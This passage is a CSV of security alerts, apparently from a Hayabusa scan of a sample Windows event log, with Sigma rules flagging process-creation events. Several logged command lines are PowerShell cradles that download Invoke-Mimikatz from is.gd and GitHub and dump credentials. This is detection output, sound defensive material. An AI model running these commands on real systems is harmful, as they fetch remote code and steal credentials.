Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 02:24:05.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:17:10.062 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:17:10.109 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:20:07.546 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:20:07.546 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:21:09.562 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:21:09.578 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:05.171 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:25:59.734 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,high,,PowerShell 
Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:26:37.046 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:27:31.828 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:28:35.375 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:29:40.093 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,high,,PowerShell Web Download and 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:30:06.203 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:38:23.076 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute 
Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web 
Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:10.232 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 
+00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 21:51:19.681 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:00:00.553 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:01:50.906 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:01:50.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:09:18.579 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:19.877 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:28.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:42:44.834 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:00.291 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:02.541 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:04.576 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:43:04.576 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-24 22:44:00.792 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: 